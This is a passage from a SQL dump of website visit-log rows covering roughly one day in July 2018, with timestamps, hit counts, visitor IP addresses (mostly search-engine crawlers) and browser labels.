ther'),(279032,1532648118,2,2,0,0,'207.46.13.180','other'),(279033,1532648338,1,1,0,0,'216.244.66.241','other'),(279034,1532648368,2,2,0,0,'178.154.171.88','other'),(279035,1532649417,1,1,0,0,'87.250.224.46','other'),(279036,1532649485,1,1,0,0,'141.8.142.74','other'),(279037,1532649645,1,1,0,0,'8.29.198.26','other'),(279038,1532650035,1,1,0,0,'91.209.11.236','other'),(279039,1532650965,1,1,0,0,'178.154.171.88','other'),(279040,1532651088,2,2,0,0,'216.244.66.241','other'),(279041,1532651167,1,1,0,0,'207.46.13.180','other'),(279042,1532651221,1,1,0,0,'141.8.142.74','other'),(279043,1532651841,1,1,0,0,'87.250.224.46','other'),(279044,1532652238,2,2,0,0,'141.8.142.74','other'),(279045,1532652917,1,0,1,0,'66.249.69.156',''),(279046,1532653187,1,1,0,0,'141.8.142.74','other'),(279047,1532653307,1,1,0,0,'178.154.171.88','other'),(279048,1532653348,1,0,1,0,'66.249.75.195',''),(279049,1532653986,1,1,0,0,'37.9.113.132','other'),(279050,1532654285,1,1,0,0,'216.244.66.241','other'),(279051,1532654780,1,1,0,0,'178.154.171.88','other'),(279052,1532654841,1,1,0,0,'141.8.142.74','other'),(279053,1532655683,1,1,0,0,'95.163.255.165','other'),(279054,1532656215,1,1,0,0,'178.238.233.160','firefox'),(279055,1532656227,1,0,1,0,'66.249.69.156',''),(279056,1532656304,1,1,0,0,'66.249.69.158','chrome'),(279057,1532656508,2,0,2,0,'66.249.75.201',''),(279058,1532656612,1,0,1,0,'66.249.75.195',''),(279059,1532656632,1,1,0,0,'66.249.69.156','chrome'),(279060,1532656797,2,2,0,0,'216.244.66.241','other'),(279061,1532657087,1,1,0,0,'37.9.113.100','other'),(279062,1532657401,1,1,0,0,'52.34.24.33','chrome'),(279063,1532657579,1,1,0,0,'178.154.171.88','other'),(279064,1532657626,1,1,0,0,'141.8.142.167','other'),(279065,1532657628,1,1,0,0,'141.8.142.96','other'),(279066,1532657670,1,1,0,0,'213.180.203.40','other'),(279067,1532657834,1,1,0,0,'141.8.142.74','other'),(279068,1532658468,1,0,1,0,'66.249.69.158',''),(279069,1532658527,1,0,1,0,'66.249.69.156',''),(279070,1532658710,1,1,0,0,'8.29.198.25','other'),(279071,1532658753,1,1,0,0,'216.244.66.241','other'),(279072,1532659523,1,1,0,0,'87.236.178.40','firefox'),(279073,1532659792,1,1,0,0,'216.244.66.241','other'),(279074,1532659955,1,1,0,0,'178.154.200.41','other'),(279075,1532660020,1,1,0,0,'66.249.75.201','chrome'),(279076,1532660055,1,0,1,0,'66.249.75.199',''),(279077,1532660060,1,1,0,0,'5.45.207.83','other'),(279078,1532660087,2,0,2,0,'66.249.69.156',''),(279079,1532660090,1,1,0,0,'66.249.75.199','chrome'),(279080,1532660096,2,0,2,0,'66.249.75.195',''),(279081,1532660099,1,0,1,0,'66.249.69.157',''),(279082,1532660299,1,1,0,0,'87.250.224.46','other'),(279083,1532660496,1,1,0,0,'8.29.198.27','other'),(279084,1532661170,1,1,0,0,'37.9.113.74','other'),(279085,1532661267,1,1,0,0,'37.9.113.60','other'),(279086,1532661347,1,1,0,0,'37.9.113.115','other'),(279087,1532661354,1,1,0,0,'178.154.200.41','other'),(279088,1532661356,1,1,0,0,'5.45.207.58','other'),(279089,1532662073,1,1,0,0,'5.45.207.82','other'),(279090,1532662156,1,1,0,0,'141.8.132.22','other'),(279091,1532662484,1,0,1,0,'66.249.75.201',''),(279092,1532662673,1,0,1,0,'66.249.75.195',''),(279093,1532663095,1,1,0,0,'87.250.224.46','other'),(279094,1532663211,1,1,0,0,'178.154.171.88','other'),(279095,1532663992,1,1,0,0,'207.46.13.189','other'),(279096,1532664170,2,2,0,0,'87.250.224.46','other'),(279097,1532664494,2,0,2,0,'66.249.75.199',''),(279098,1532665207,1,0,1,0,'66.249.75.201',''),(279099,1532665277,1,1,0,0,'89.42.216.41','firefox'),(279100,1532665300,2,2,0,0,'141.8.142.74','other'),(279101,1532665336,1,1,0,0,'207.46.13.189','other'),(279102,1532665955,1,1,0,0,'178.154.171.88','other'),(279103,1532666751,1,1,0,0,'87.250.224.46','other'),(279104,1532666757,2,2,0,0,'141.8.142.74','other'),(279105,1532667239,1,0,1,0,'66.249.75.195',''),(279106,1532667394,4,4,0,0,'216.244.66.241','other'),(279107,1532667404,1,1,0,0,'178.154.171.88','other'),(279108,1532667494,1,0,1,0,'66.249.75.201',''),(279109,1532668358,1,1,0,0,'213.180.203.8','other'),(279110,1532668460,6,6,0,0,'94.130.9.183','other'),(279111,1532668475,1,1,0,0,'216.244.66.241','other'),(279112,1532668944,1,1,0,0,'180.76.15.30','other'),(279113,1532669491,1,1,0,0,'178.154.171.88','other'),(279114,1532669519,1,1,0,0,'91.196.178.132','firefox'),(279115,1532669612,1,1,0,0,'8.29.198.26','other'),(279116,1532669794,3,3,0,0,'141.8.142.74','other'),(279117,1532670019,1,1,0,0,'37.55.93.20','chrome'),(279118,1532670747,1,1,0,0,'91.196.178.70','firefox'),(279119,1532670810,1,1,0,0,'95.163.255.191','other'),(279120,1532671137,1,1,0,0,'216.244.66.241','other'),(279121,1532671344,1,1,0,0,'8.29.198.25','other'),(279122,1532671667,1,1,0,0,'66.102.9.35','chrome'),(279123,1532672354,1,1,0,0,'95.132.61.224','firefox'),(279124,1532672657,1,1,0,0,'178.95.66.69','chrome'),(279125,1532672732,3,3,0,0,'91.196.178.169','chrome'),(279126,1532673243,2,2,0,0,'216.244.66.241','other'),(279127,1532673279,1,1,0,0,'176.105.216.241','chrome'),(279128,1532673464,1,1,0,0,'213.180.203.8','other'),(279129,1532673467,1,1,0,0,'178.154.171.88','other'),(279130,1532673541,1,1,0,0,'91.196.177.129','chrome'),(279131,1532674022,1,1,0,0,'141.8.142.74','other'),(279132,1532674393,1,1,0,0,'92.52.179.67','chrome'),(279133,1532674507,1,0,1,0,'66.249.75.201',''),(279134,1532674673,1,1,0,0,'95.163.255.118','other'),(279135,1532674684,1,1,0,0,'95.163.255.106','other'),(279136,1532674753,1,1,0,0,'46.229.168.75','other'),(279137,1532674784,2,2,0,0,'178.154.200.41','other'),(279138,1532675007,2,2,0,0,'178.154.171.88','other'),(279139,1532675011,2,2,0,0,'87.250.224.46','other'),(279140,1532675524,2,2,0,0,'216.244.66.241','other'),(279141,1532675542,3,3,0,0,'141.8.142.74','other'),(279142,1532675831,2,2,0,0,'91.196.178.86','chrome'),(279143,1532676051,1,1,0,0,'95.163.255.193','other'),(279144,1532676159,1,0,1,0,'66.249.75.201',''),(279145,1532676427,2,2,0,0,'178.154.171.88','other'),(279146,1532676448,1,1,0,0,'141.8.142.74','other'),(279147,1532676666,1,1,0,0,'37.9.113.182','other'),(279148,1532676828,1,1,0,0,'184.168.200.223','firefox'),(279149,1532677465,1,1,0,0,'87.250.224.85','other'),(279150,1532677957,1,1,0,0,'87.250.224.46','other'),(279151,1532678791,1,1,0,0,'141.8.142.74','other'),(279152,1532678835,4,4,0,0,'207.46.13.180','other'),(279153,1532678841,6,6,0,0,'207.46.13.189','other'),(279154,1532678846,3,3,0,0,'207.46.13.186','other'),(279155,1532679251,1,1,0,0,'193.28.200.2','firefox'),(279156,1532679633,3,3,0,0,'91.196.178.169','chrome'),(279157,1532680230,1,1,0,0,'87.250.224.46','other'),(279158,1532680503,1,1,0,0,'8.29.198.27','other'),(279159,1532680992,2,2,0,0,'216.244.66.241','other'),(279160,1532681031,2,2,0,0,'162.210.196.130','other'),(279161,1532681090,2,2,0,0,'91.196.178.86','chrome'),(279162,1532681714,1,1,0,0,'178.251.107.35','chrome'),(279163,1532681792,2,2,0,0,'141.8.142.74','other'),(279164,1532682196,1,1,0,0,'8.29.198.26','other'),(279165,1532682934,1,1,0,0,'95.163.255.94','other'),(279166,1532682936,2,2,0,0,'83.142.233.83','chrome'),(279167,1532682982,2,2,0,0,'176.37.93.234','chrome'),(279168,1532683650,2,2,0,0,'141.8.142.74','other'),(279169,1532683909,1,1,0,0,'37.9.113.182','other'),(279170,1532683931,1,1,0,0,'216.244.66.241','other'),(279171,1532683974,1,1,0,0,'94.178.207.235','chrome'),(279172,1532684509,2,2,0,0,'91.196.178.169','chrome'),(279173,1532685465,1,1,0,0,'207.46.13.180','other'),(279174,1532685469,1,1,0,0,'141.8.142.74','other'),(279175,1532685958,2,0,2,0,'66.249.75.199',''),(279176,1532686322,1,1,0,0,'94.178.147.248','chrome'),(279177,1532686620,2,2,0,0,'216.244.66.241','other'),(279178,1532686798,2,2,0,0,'134.249.146.125','chrome'),(279179,1532686940,1,1,0,0,'141.8.142.74','other'),(279180,1532687595,1,1,0,0,'87.250.224.46','other'),(279181,1532688539,3,3,0,0,'178.154.171.88','other'),(279182,1532688741,1,0,1,0,'66.249.75.199',''),(279183,1532689210,1,1,0,0,'46.33.245.142','chrome'),(279184,1532689559,1,1,0,0,'46.219.5.135','chrome'),(279185,1532689938,1,1,0,0,'178.154.200.7','other'),(279186,1532690103,1,1,0,0,'51.255.66.115','other'),(279187,1532690927,1,0,1,0,'66.249.69.157',''),(279188,1532691412,1,1,0,0,'216.244.66.241','other'),(279189,1532691417,1,1,0,0,'8.29.198.26','other'),(279190,1532691829,1,1,0,0,'178.92.212.54','chrome'),(279191,1532692590,1,1,0,0,'54.165.59.7','other'),(279192,1532692911,1,1,0,0,'87.250.224.46','other'),(279193,1532693035,1,1,0,0,'8.29.198.27','other'),(279194,1532693257,2,2,0,0,'141.8.142.74','other'),(279195,1532693746,1,1,0,0,'188.32.20.12','chrome'),(279196,1532693782,1,1,0,0,'94.153.141.102','chrome'),(279197,1532693817,1,1,0,0,'178.154.171.88','other'),(279198,1532694039,5,5,0,0,'216.244.66.241','other'),(279199,1532694053,1,1,0,0,'95.163.255.109','other'),(279200,1532694141,1,1,0,0,'91.209.11.236','other'),(279201,1532694746,1,1,0,0,'95.135.120.117','chrome'),(279202,1532694750,3,3,0,0,'141.8.142.74','other'),(279203,1532694873,1,1,0,0,'178.154.171.88','other'),(279204,1532695668,1,1,0,0,'178.154.200.41','other'),(279205,1532695763,3,0,3,0,'66.249.75.195',''),(279206,1532695785,1,1,0,0,'178.154.171.88','other'),(279207,1532696214,1,1,0,0,'216.244.66.241','other'),(279208,1532696276,1,0,1,0,'66.249.75.201',''),(279209,1532697009,1,1,0,0,'37.54.187.1','chrome'),(279210,1532697653,1,1,0,0,'40.77.167.60','other'),(279211,1532697949,2,0,2,0,'66.249.75.201',''),(279212,1532698336,1,1,0,0,'141.8.142.74','other'),(279213,1532698677,1,1,0,0,'91.209.11.236','other'),(279214,1532698989,1,1,0,0,'95.163.255.93','other'),(279215,1532699366,1,1,0,0,'37.9.113.182','other'),(279216,1532699367,1,1,0,0,'141.8.142.74','other'),(279217,1532699451,1,0,1,0,'66.249.75.201',''),(279218,1532699851,1,1,0,0,'178.154.171.88','other'),(279219,1532699858,1,1,0,0,'37.9.113.115','other'),(279220,1532700060,1,1,0,0,'216.244.66.241','other'),(279221,1532700113,1,1,0,0,'207.46.13.186','other'),(279222,1532700647,1,0,1,0,'66.249.75.195',''),(279223,1532700665,1,0,1,0,'66.249.69.158',''),(279224,1532700764,1,1,0,0,'180.76.15.145','other'),(279225,1532700949,1,1,0,0,'87.250.224.46','other'),(279226,1532701471,1,0,1,0,'66.249.75.199',''),(279227,1532701556,2,0,2,0,'66.249.75.201',''),(279228,1532701575,1,1,0,0,'66.249.69.156','chrome'),(279229,1532701704,1,1,0,0,'66.249.75.201','chrome'),(279230,1532701755,1,1,0,0,'141.8.142.74','other'),(279231,1532701811,1,1,0,0,'188.230.43.254','other'),(279232,1532701968,96,96,0,0,'108.59.8.70','other'),(279233,1532702270,1,1,0,0,'216.244.66.241','other'),(279234,1532702320,1,1,0,0,'8.29.198.27','other'),(279235,1532702446,1,1,0,0,'37.9.113.182','other'),(279236,1532702492,1,1,0,0,'94.130.187.202','other'),(279237,1532702611,1,1,0,0,'91.196.178.85','firefox'),(279238,1532703521,1,1,0,0,'87.250.224.46','other'),(279239,1532703548,2,2,0,0,'37.9.113.182','other'),(279240,1532703572,1,1,0,0,'178.140.184.122','chrome'),(279241,1532703772,3,3,0,0,'95.163.255.114','other'),(279242,1532703850,1,1,0,0,'95.163.255.104','other'),(279243,1532703868,1,1,0,0,'95.163.255.115','other'),(279244,1532703878,1,1,0,0,'8.29.198.26','other'),(279245,1532704380,1,1,0,0,'188.230.43.254','other'),(279246,1532704717,5,5,0,0,'216.244.66.241','other'),(279247,1532705424,1,1,0,0,'141.8.142.74','other'),(279248,1532706195,1,1,0,0,'37.9.113.182','other'),(279249,1532706443,1,0,1,0,'66.249.75.195',''),(279250,1532706604,1,1,0,0,'188.230.43.254','other'),(279251,1532707081,1,1,0,0,'37.9.113.115','other'),(279252,1532707419,1,1,0,0,'216.244.66.241','other'),(279253,1532708053,2,0,2,0,'66.249.75.195',''),(279254,1532708164,1,1,0,0,'40.77.167.69','other'),(279255,1532708256,1,1,0,0,'87.250.224.46','other'),(279256,1532708686,1,0,1,0,'66.249.75.199',''),(279257,1532708903,1,1,0,0,'5.45.207.58','other'),(279258,1532709009,1,1,0,0,'188.230.43.254','other'),(279259,1532709176,1,0,1,0,'66.249.75.195',''),(279260,1532709495,3,3,0,0,'216.244.66.241','other'),(279261,1532710799,1,0,1,0,'66.249.75.195',''),(279262,1532711406,1,1,0,0,'66.249.69.157','chrome'),(279263,1532711416,2,1,1,0,'66.249.75.199',''),(279264,1532711551,1,1,0,0,'46.211.103.19','chrome'),(279265,1532711717,1,1,0,0,'213.180.203.40','other'),(279266,1532711721,1,1,0,0,'87.250.224.85','other'),(279267,1532712174,1,1,0,0,'46.33.243.175','chrome'),(279268,1532712210,2,2,0,0,'216.244.66.241','other'),(279269,1532712323,1,1,0,0,'87.250.224.46','other'),(279270,1532712744,1,0,1,0,'66.249.69.156',''),(279271,1532712984,1,0,1,0,'66.249.75.195',''),(279272,1532713222,1,1,0,0,'8.29.198.26','other'),(279273,1532713391,1,0,1,0,'66.249.75.199',''),(279274,1532714169,2,2,0,0,'37.9.113.110','other'),(279275,1532714723,1,1,0,0,'8.29.198.26','other'),(279276,1532715025,1,1,0,0,'141.8.142.152','other'),(279277,1532715503,1,1,0,0,'94.23.29.127','firefox'),(279278,1532715665,2,2,0,0,'178.154.171.88','other'),(279279,1532715969,1,1,0,0,'87.250.224.46','other'),(279280,1532716115,1,1,0,0,'216.244.66.241','other'),(279281,1532716368,2,2,0,0,'91.196.178.84','chrome'),(279282,1532716988,1,1,0,0,'207.46.13.189','other'),(279283,1532717969,5,5,0,0,'216.244.66.241','other'),(279284,1532718142,1,1,0,0,'40.77.167.60','other'),(279285,1532718469,1,1,0,0,'37.73.136.39','chrome'),(279286,1532719005,2,2,0,0,'178.154.171.88','other'),(279287,1532719026,1,1,0,0,'141.8.142.74','other'),(279288,1532720399,1,1,0,0,'95.163.255.95','other'),(279289,1532720639,1,1,0,0,'216.244.66.241','other'),(279290,1532722109,1,1,0,0,'95.163.255.171','other'),(279291,1532722173,1,0,1,0,'66.249.69.156',''),(279292,1532722328,1,1,0,0,'178.154.171.88','other'),(279293,1532722473,1,1,0,0,'37.9.113.182','other'),(279294,1532722563,1,1,0,0,'141.8.132.19','other'),(279295,1532723265,3,3,0,0,'216.244.66.241','other'),(279296,1532723584,2,2,0,0,'62.210.157.129','other'),(279297,1532724112,1,1,0,0,'8.29.198.26','other'),(279298,1532724581,1,1,0,0,'141.8.142.74','other'),(279299,1532725403,4,4,0,0,'216.244.66.241','other'),(279300,1532725562,1,1,0,0,'8.29.198.27','other'),(279301,1532726730,1,1,0,0,'141.8.142.74','other'),(279302,1532727860,1,1,0,0,'178.154.171.88','other'),(279303,1532728624,3,3,0,0,'91.196.178.97','chrome'),(279304,1532730953,2,2,0,0,'216.244.66.241','other'),(279305,1532731887,1,1,0,0,'54.165.59.7','other'),(279306,1532732185,1,1,0,0,'178.154.171.88','other'),(279307,1532732192,1,1,0,0,'141.8.142.74','other'),(279308,1532732218,1,1,0,0,'37.9.113.182','other'),(279309,1532732993,1,1,0,0,'207.46.13.186','other'),(279310,1532733319,1,1,0,0,'134.249.50.5','chrome'),(279311,1532734010,2,2,0,0,'141.8.142.74','other'),(279312,1532734082,1,1,0,0,'178.154.171.88','other'),(279313,1532734938,1,1,0,0,'37.9.113.182','other'),(279314,1532734989,1,1,0,0,'8.29.198.25','other'),(279315,1532736217,1,1,0,0,'216.244.66.241','other'),(279316,1532736408,1,1,0,0,'8.29.198.26','other'),(279317,1532736942,25,25,0,0,'207.46.13.189','other'),(279318,1532736968,15,15,0,0,'40.77.167.60','other'),(279319,1532736985,14,14,0,0,'40.77.167.69','other'),(279320,1532737001,12,12,0,0,'207.46.13.186','other'),(279321,1532739286,2,2,0,0,'178.154.171.88','other'),(279322,1532740667,1,1,0,0,'35.202.99.105','other'),(279323,1532740671,1,1,0,0,'141.8.142.74','other'),(279324,1532740901,1,1,0,0,'216.244.66.241','other'),(279325,1532741243,2,2,0,0,'54.165.59.7','other'),(279326,1532741268,1,1,0,0,'87.250.224.46','other'),(279327,1532741942,1,1,0,0,'35.162.70.167','chrome'),(279328,1532742113,1,1,0,0,'141.8.142.74','other'),(279329,1532743394,1,1,0,0,'141.8.142.74','other'),(279330,1532743891,1,0,1,0,'66.249.75.195',''),(279331,1532744339,2,2,0,0,'178.154.171.88','other'),(279332,1532744510,1,1,0,0,'141.8.142.74','other'),(279333,1532744772,1,1,0,0,'5.45.207.58','other'),(279334,1532744810,1,1,0,0,'37.9.113.182','other'),(279335,1532745850,1,1,0,0,'8.29.198.27','other'),(279336,1532745981,1,1,0,0,'216.244.66.241','other'),(279337,1532746443,1,0,1,0,'66.249.75.201',''),(279338,1532746783,1,1,0,0,'178.154.171.88','other'),(279339,1532747247,1,1,0,0,'8.29.198.26','other'),(279340,1532747464,1,1,0,0,'37.9.113.182','other'),(279341,1532747486,1,1,0,0,'141.8.142.74','other'),(279342,1532748336,7,7,0,0,'82.193.102.149','other'),(279343,1532748450,2,2,0,0,'141.8.142.74','other'),(279344,1532749412,1,1,0,0,'216.244.66.241','other'),(279345,1532749441,1,1,0,0,'95.28.165.113','msie'),(279346,1532749615,1,1,0,0,'178.154.171.88','other'),(279347,1532749717,3,3,0,0,'141.8.142.74','other'),(279348,1532749723,1,1,0,0,'87.250.224.46','other'),(279349,1532751901,1,0,1,0,'66.249.75.195',''),(279350,1532751945,2,2,0,0,'35.202.99.105','other'),(279351,1532751958,1,0,1,0,'66.249.69.156',''),(279352,1532752077,1,1,0,0,'178.154.171.88','other'),(279353,1532752145,2,2,0,0,'87.250.224.46','other'),(279354,1532752347,1,1,0,0,'141.8.142.167','other'),(279355,1532752435,1,1,0,0,'216.244.66.241','other'),(279356,1532753396,1,1,0,0,'52.53.201.78','chrome'),(279357,1532754255,598,598,0,0,'185.6.8.3','other'),(279358,1532754861,1,1,0,0,'37.9.113.114','other'),(279359,1532755156,273,273,0,0,'185.6.8.3','other'),(279360,1532755472,1,1,0,0,'81.161.192.6','firefox'),(279361,1532755524,1,1,0,0,'31.184.238.113','firefox'),(279362,1532755584,1,1,0,0,'95.24.207.73','msie'),(279363,1532756038,3,3,0,0,'207.244.157.10','other'),(279364,1532756226,1,0,1,0,'66.249.69.156',''),(279365,1532756413,1,1,0,0,'37.9.113.182','other'),(279366,1532756474,2,2,0,0,'162.210.196.129','other'),(279367,1532756728,1,1,0,0,'8.29.198.26','other'),(279368,1532757073,1,1,0,0,'178.154.171.88','other'),(279369,1532757252,2,2,0,0,'92.113.189.235','chrome'),(279370,1532757635,1,1,0,0,'180.76.15.139','other'),(279371,1532758095,1,1,0,0,'8.29.198.25','other'),(279372,1532758176,1,1,0,0,'207.46.13.189','other'),(279373,1532758388,1,1,0,0,'163.172.4.153','chrome'),(279374,1532758613,1,1,0,0,'141.8.142.74','other'),(279375,1532758654,1,1,0,0,'37.9.113.182','other'),(279376,1532759667,4,4,0,0,'141.8.142.74','other'),(279377,1532760054,1,1,0,0,'216.244.66.241','other'),(279378,1532760218,1,0,1,0,'66.249.69.158',''),(279379,1532760792,1,1,0,0,'193.93.217.21','chrome'),(279380,1532761939,1,1,0,0,'37.9.113.182','other'),(279381,1532762026,1,0,1,0,'66.249.75.201',''),(279382,1532762651,1,1,0,0,'216.244.66.241','other'),(279383,1532764647,1,1,0,0,'87.250.224.46','other'),(279384,1532764723,2,2,0,0,'141.8.142.74','other'),(279385,1532765560,1,1,0,0,'91.196.178.41','chrome'),(279386,1532765673,1,1,0,0,'216.244.66.241','other'),(279387,1532766011,1,1,0,0,'130.180.220.209','firefox'),(279388,1532767247,1,1,0,0,'207.46.13.189','other'),(279389,1532767288,1,1,0,0,'176.121.255.46','chrome'),(279390,1532767318,1,1,0,0,'37.9.113.157','other'),(279391,1532767362,1,1,0,0,'37.9.113.100','other'),(279392,1532767459,1,1,0,0,'178.154.171.88','other'),(279393,1532767599,1,1,0,0,'8.29.198.25','other'),(279394,1532768058,1,1,0,0,'216.244.66.241','other'),(279395,1532768586,1,1,0,0,'87.250.224.46','other'),(279396,1532768928,1,1,0,0,'8.29.198.25','other'),(279397,1532769040,1,1,0,0,'178.154.171.88','other'),(279398,1532769482,1,1,0,0,'216.244.66.241','other'),(279399,1532769929,1,1,0,0,'141.8.142.74','other'),(279400,1532771774,1,1,0,0,'141.8.142.74','other'),(279401,1532773423,2,2,0,0,'141.8.142.74','other'),(279402,1532774787,1,1,0,0,'178.154.171.88','other'),(279403,1532775646,1,1,0,0,'216.244.66.241','other'),(279404,1532775873,1,1,0,0,'141.8.142.74','other'),(279405,1532776456,2,2,0,0,'91.196.178.163','chrome'),(279406,1532777399,2,2,0,0,'54.165.59.7','other'),(279407,1532778228,1,1,0,0,'178.154.200.41','other'),(279408,1532778281,3,3,0,0,'216.244.66.241','other'),(279409,1532778432,1,1,0,0,'40.77.167.60','other'),(279410,1532778461,1,1,0,0,'8.29.198.26','other'),(279411,1532778583,1,1,0,0,'141.8.142.74','other'),(279412,1532779035,1,1,0,0,'178.154.171.88','other'),(279413,1532779097,1,1,0,0,'54.165.59.7','other'),(279414,1532779776,1,1,0,0,'8.29.198.26','other'),(279415,1532780551,1,1,0,0,'54.165.59.7','other'),(279416,1532780741,2,2,0,0,'216.244.66.241','other'),(279417,1532781191,1,1,0,0,'37.54.232.130','chrome'),(279418,1532781776,1,1,0,0,'178.154.171.88','other'),(279419,1532783286,2,2,0,0,'216.244.66.241','other'),(279420,1532783849,1,0,1,0,'66.249.69.158',''),(279421,1532783877,1,0,1,0,'66.249.75.201',''),(279422,1532783882,1,1,0,0,'66.249.75.199','chrome'),(279423,1532784183,1,1,0,0,'54.165.59.7','other'),(279424,1532784255,1,1,0,0,'141.8.142.74','other'),(279425,1532784327,1,1,0,0,'37.9.113.182','other'),(279426,1532785317,1,1,0,0,'141.8.142.74','other'),(279427,1532786176,1,1,0,0,'216.244.66.241','other'),(279428,1532786708,1,1,0,0,'109.86.71.21','chrome'),(279429,1532787141,1,1,0,0,'91.196.178.173','firefox'),(279430,1532787816,2,2,0,0,'91.209.11.236','other'),(279431,1532788111,2,2,0,0,'95.163.255.119','other'),(279432,1532788409,1,1,0,0,'95.163.255.102','other'),(279433,1532789344,1,1,0,0,'8.29.198.25','other'),(279434,1532789697,1,1,0,0,'178.154.171.88','other'),(279435,1532789778,1,1,0,0,'141.8.142.74','other'),(279436,1532789925,1,1,0,0,'87.250.224.46','other'),(279437,1532790395,1,1,0,0,'91.209.11.236','other'),(279438,1532790628,1,1,0,0,'8.29.198.26','other'),(279439,1532790673,1,1,0,0,'62.83.138.245','chrome'),(279440,1532790972,1,1,0,0,'66.249.75.201','chrome'),(279441,1532791466,1,1,0,0,'94.158.95.227','firefox'),(279442,1532791791,1,1,0,0,'178.154.171.88','other'),(279443,1532792223,1,1,0,0,'91.209.11.236','other'),(279444,1532793038,1,1,0,0,'95.163.255.94','other'),(279445,1532793272,1,1,0,0,'141.8.142.74','other'),(279446,1532793390,1,1,0,0,'178.154.171.88','other'),(279447,1532793637,2,2,0,0,'216.244.66.241','other'),(279448,1532794550,1,1,0,0,'216.244.66.241','other'),(279449,1532794924,1,1,0,0,'91.209.11.236','other'),(279450,1532795065,1,1,0,0,'95.158.42.155','chrome'),(279451,1532796400,1,1,0,0,'216.244.66.241','other'),(279452,1532796729,1,1,0,0,'178.154.171.88','other'),(279453,1532796733,1,1,0,0,'141.8.142.74','other'),(279454,1532798055,1,1,0,0,'216.244.66.241','other'),(279455,1532800200,1,1,0,0,'8.29.198.27','other'),(279456,1532800792,1,1,0,0,'216.244.66.241','other'),(279457,1532801467,1,1,0,0,'8.29.198.26','other'),(279458,1532804385,1,1,0,0,'91.209.11.236','other'),(279459,1532804552,1,1,0,0,'87.250.224.46','other'),(279460,1532804650,1,1,0,0,'95.163.255.102','other'),(279461,1532805305,2,2,0,0,'91.209.11.236','other'),(279462,1532805990,1,1,0,0,'87.250.224.46','other'),(279463,1532806941,2,2,0,0,'216.244.66.241','other'),(279464,1532806972,1,1,0,0,'91.196.178.131','firefox'),(279465,1532807868,1,1,0,0,'178.154.171.88','other'),(279466,1532808656,6,6,0,0,'51.68.226.8','other'),(279467,1532809465,1,1,0,0,'157.55.39.167','other'),(279468,1532809658,3,3,0,0,'216.244.66.241','other'),(279469,1532810378,1,1,0,0,'87.250.224.46','other'),(279470,1532810629,1,0,1,0,'66.249.75.201',''),(279471,1532811055,1,1,0,0,'8.29.198.26','other'),(279472,1532812192,3,3,0,0,'216.244.66.241','other'),(279473,1532812304,1,1,0,0,'8.29.198.27','other'),(279474,1532812604,1,1,0,0,'66.249.69.158','chrome'),(279475,1532813247,2,2,0,0,'178.154.171.88','other'),(279476,1532815008,1,1,0,0,'178.154.171.88','other'),(279477,1532815088,4,4,0,0,'216.244.66.241','other'),(279478,1532815094,1,1,0,0,'141.8.142.74','other'),(279479,1532817772,2,2,0,0,'216.244.66.241','other'),(279480,1532818415,1,1,0,0,'178.154.171.88','other'),(279481,1532818769,1,1,0,0,'95.163.255.119','other'),(279482,1532819266,1,1,0,0,'87.250.224.46','other'),(279483,1532819463,2,2,0,0,'141.8.142.74','other'),(279484,1532820202,1,1,0,0,'91.209.11.236','other'),(279485,1532820460,6,6,0,0,'216.244.66.241','other'),(279486,1532821093,1,1,0,0,'178.154.171.88','other'),(279487,1532821903,1,1,0,0,'8.29.198.27','other'),(279488,1532822087,1,1,0,0,'178.154.171.88','other'),(279489,1532822471,1,1,0,0,'180.76.15.135','other'),(279490,1532822617,1,1,0,0,'66.228.40.69','firefox'),(279491,1532822743,1,1,0,0,'91.209.11.236','other'),(279492,1532822758,1,1,0,0,'216.244.66.241','other'),(279493,1532823144,1,1,0,0,'8.29.198.27','other'),(279494,1532823993,2,2,0,0,'87.250.224.46','other'),(279495,1532824418,1,1,0,0,'141.8.142.74','other'),(279496,1532824783,1,1,0,0,'178.154.171.88','other'),(279497,1532825364,3,3,0,0,'216.244.66.241','other'),(279498,1532826124,1,1,0,0,'141.8.142.74','other'),(279499,1532826469,1,1,0,0,'91.209.11.236','other'),(279500,1532827316,1,1,0,0,'178.154.200.41','other'),(279501,1532827319,1,1,0,0,'95.108.213.24','other'),(279502,1532827448,1,1,0,0,'35.162.70.167','chrome'),(279503,1532827642,2,2,0,0,'178.154.171.88','other'),(279504,1532827878,1,1,0,0,'216.244.66.241','other'),(279505,1532829986,6,6,0,0,'157.55.39.46','other'),(279506,1532829993,3,3,0,0,'40.77.167.49','other'),(279507,1532829996,4,4,0,0,'157.55.39.143','other'),(279508,1532830001,4,4,0,0,'40.77.167.148','other'),(279509,1532830575,1,1,0,0,'216.244.66.241','other'),(279510,1532831172,1,1,0,0,'37.9.113.186','other'),(279511,1532832079,1,1,0,0,'87.250.224.85','other'),(279512,1532832747,1,1,0,0,'8.29.198.26','other'),(279513,1532833061,1,1,0,0,'87.250.224.66','other'),(279514,1532833209,2,2,0,0,'216.244.66.241','other'),(279515,1532833832,1,1,0,0,'141.8.142.96','other'),(279516,1532833859,1,1,0,0,'141.8.142.152','other'),(279517,1532833862,1,1,0,0,'37.9.113.134','other'),(279518,1532833989,1,1,0,0,'8.29.198.25','other'),(279519,1532835000,1,1,0,0,'37.9.113.186','other'),(279520,1532835778,1,1,0,0,'216.244.66.241','other'),(279521,1532835850,1,1,0,0,'66.249.69.157','chrome'),(279522,1532836689,1,1,0,0,'178.154.200.73','other'),(279523,1532836783,1,1,0,0,'141.8.142.74','other'),(279524,1532836988,1,1,0,0,'178.154.200.45','other'),(279525,1532837373,1,1,0,0,'87.250.224.66','other'),(279526,1532837831,3,3,0,0,'40.77.167.49','other'),(279527,1532837835,4,4,0,0,'40.77.167.148','other'),(279528,1532837842,4,4,0,0,'157.55.39.143','other'),(279529,1532837847,6,6,0,0,'157.55.39.46','other'),(279530,1532838311,3,3,0,0,'216.244.66.241','other'),(279531,1532838861,1,1,0,0,'157.55.39.46','other'),(279532,1532839588,1,1,0,0,'141.8.142.123','other'),(279533,1532840569,1,1,0,0,'46.211.153.189','chrome'),(279534,1532840747,1,1,0,0,'91.209.11.236','other'),(279535,1532840976,2,2,0,0,'216.244.66.241','other'),(279536,1532841024,4,4,0,0,'157.55.39.143','other'),(279537,1532841029,3,3,0,0,'40.77.167.49','other'),(279538,1532841038,6,6,0,0,'157.55.39.46','other'),(279539,1532841040,4,4,0,0,'40.77.167.148','other'),(279540,1532841132,1,1,0,0,'37.9.113.100','other'),(279541,1532841136,1,1,0,0,'5.45.207.58','other'),(279542,1532842359,2,2,0,0,'162.210.196.100','other'),(279543,1532842702,1,1,0,0,'157.55.39.46','other'),(279544,1532843189,1,1,0,0,'95.163.255.103','other'),(279545,1532843587,1,1,0,0,'8